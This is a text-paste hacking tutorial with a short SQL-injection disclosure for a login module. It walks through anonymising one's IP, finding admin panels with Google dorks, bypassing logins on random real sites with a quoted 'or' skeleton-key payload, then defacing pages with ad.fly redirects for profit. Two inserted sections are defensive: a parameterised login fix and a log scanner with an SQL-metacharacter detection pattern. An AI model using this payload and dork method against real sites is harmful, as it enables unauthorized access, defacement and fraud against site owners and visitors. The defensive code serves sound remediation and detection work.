- +-==============================================================-+
- | DIY Guide >>> SQLi <<< |
- | |
- | A N O F F I C I A L G U I D E |
- +-==============================================================-+
- | Vulnerability Disclosure: |
- | The vulnerability is located in the `username` and `password` |
- | input field values of the `login` module. Remote attackers are |
- | able to execute their own SQL commands by manipulating the GET |
- | request that carries the vulnerable username and password |
- | parameters. The request method used to inject the SQL command |
- | is GET, and the issue is located on the application side of |
- | the online service. The SQL vulnerability allows an attacker |
- | to remotely gain unauthorized access to the account system of |
- | the content management system. |
- +-==============================================================-+
- | Request Method(s): |
- | [+] GET |
- | Vulnerable Module(s): |
- | [+] Login |
- | Vulnerable Parameter(s): |
- | [+] username |
- | [+] password |
- +-==============================================================-+
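The fix for the flaw disclosed above, as an added example (not part of the original paste or of the affected CMS's code): a login check that refuses credentials sent by GET, looks the user up with a bound parameter and verifies a salted hash outside SQL. The in-memory SQLite table, the `login` helper and the sample account are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000  # PBKDF2 work factor (illustrative value)


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the CMS account store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, hash_password("correct horse battery", salt)))
    return db


def login(db: sqlite3.Connection, method: str, username: str, password: str) -> bool:
    # Credentials must not travel in a GET query string: URLs end up in
    # access logs, browser history and Referer headers.
    if method.upper() != "POST":
        return False
    # Bound parameter: the driver passes the value as data, so quotes and
    # keywords in `username` cannot alter the structure of the statement.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # The password never appears in SQL; it is hashed and compared in
    # constant time in application code.
    return hmac.compare_digest(stored, hash_password(password, salt))
```

With this structure the string listed later in the paste as the "Skeleton Key" is simply a user name that does not exist.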
- | Tutorial |
- | |
- | In this tutorial we will be pen testing random administration |
- | panels from around the world. This is a method pen-testers use |
- | to bypass weak CMS/Admin Panels. This method requires no |
- | experience. |
- | |
- | 1.) Protect your IP# from being logged: |
- | Hacking like this is illegal, so taking the risk is entirely |
- | up to you, I take no responsibility. For educational purposes |
- | only. |
- | |
- | OK, before we begin you need to protect your IP# from being |
- | logged by the server you're about to hack into. For this we're |
- | gonna need a proxy/VPN (Virtual Private Network). I'd suggest |
- | using Tor if you have it; if not, I would recommend using |
- | Hotspot Shield for this tutorial (it's free): |
- | https://www.hotspotshield.com/ |
- | |
- | IP Test: |
- | http://whatismyipaddress.com/ |
- | To test your IP, turn on your proxy/VPN and refresh the page |
- | above. If your IP# changes, you're good. If not, try again |
- | until it does. |
- | |
- | Next you need to disable WebRTC in your web browser to prevent |
- | your VPN from leaking your real IP address. |
- | http://hackforums.net/showthread.php?tid=4682819 |
- | |
- | 2.) Go to Google & Search: |
- | intitle:Admin inurl:login.php site:.com |
- | |
- | ***Screenshot: http://i.imgur.com/6FKY2xS.jpg*** |
- | ^^This will be your Main Dork. You can modify it to find more |
- | vulnerable admin panels. |
- | |
- | EXAMPLES: |
- | intitle:Admin inurl:login.php site:.net |
- | intitle:Admin inurl:login.php site:.org |
- | intitle:Admin inurl:login.php site:.uk |
- | intitle:Admin inurl:login.php site:.br |
- | |
- | To find more Web Country Codes, go to: |
- | http://goes.gsfc.nasa.gov/text/web_country_codes.html |
- | |
- | Other dork extensions you could try: |
- | inurl:/admin_login |
- | inurl://admin/_login.php |
- | inurl://panel/admin.php |
- | inurl://admin/admin_login.php |
- | inurl://administracao/ |
- | inurl://admin/autentica/loga.php |
- | |
- | 3.) Locating vulnerable admin panels: |
- | Locating vulnerable admin panels is a slow process and |
- | requires a little patience, but the payout is half the fun. |
- | Enter your Google dork (posted above) and, starting at page 1 |
- | in Google, click on links one by one (Right-Click > Open link |
- | in new tab) until you have 5-10 tabs open in your browser. |
- | |
- | 4.) Skeleton Key: |
- | USERNAME: '=' 'or' |
- | PASSWORD: '=' 'or' |
- | |
- | Once at the admin panel, enter your Skeleton Key in an attempt |
- | to bypass: |
- | ***Screenshot: http://i.imgur.com/04mGZ0Q.jpg*** |
- | ***Screenshot: http://i.imgur.com/K3IxjkX.jpg*** |
- | |
- | 5.) Demos: |
- | |
- | That's it! Once you're in the admin panel you can start |
- | editing the site. To take advantage of this, replace links, |
- | banners, directories, etc. with your ad.fly link to redirect |
- | users and earn money. |
- +-==============================================================-+
- (c) mObiIe | Edited Tutorial 2012
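Because the disclosure states that the injection travels in the `username` and `password` parameters of a GET request, attempts like the one in step 4 are recorded in the web server's access log. The following is an added detection example (not part of the original paste); the combined log format, the sample lines, the addresses and the paths are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
CRED_PARAMS = {"username", "password"}  # parameters named in the disclosure
# Quote characters, SQL comment markers, or a UNION SELECT fragment.
SQL_META = re.compile(r"""['"]|--|/\*|\bunion\b\s+select\b""", re.I)


def suspicious_logins(lines):
    """Return (client_ip, path, param, status) for every GET request whose
    username/password query parameter contains SQL metacharacters."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        if method != "GET":
            continue
        url = urlsplit(target)
        # parse_qs percent-decodes values, so %27 is seen as a quote.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() in CRED_PARAMS and any(SQL_META.search(v) for v in values):
                hits.append((ip, url.path, name.lower(), int(status)))
    return hits


# Constructed sample log lines (documentation address ranges, made-up paths).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin/login.php?username=alice&password=hunter2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/login.php?username=%27%3D%27+%27or%27&password=%27%3D%27+%27or%27 HTTP/1.1" 302 0',
    '203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "POST /admin/login.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=rock+%27n%27+roll HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_logins(SAMPLE):
        print(hit)
```

A legitimate password containing a quote will also match, so treat hits as leads to triage by source address and response status; moving the login form to POST, as a fix, also removes credentials from these logs.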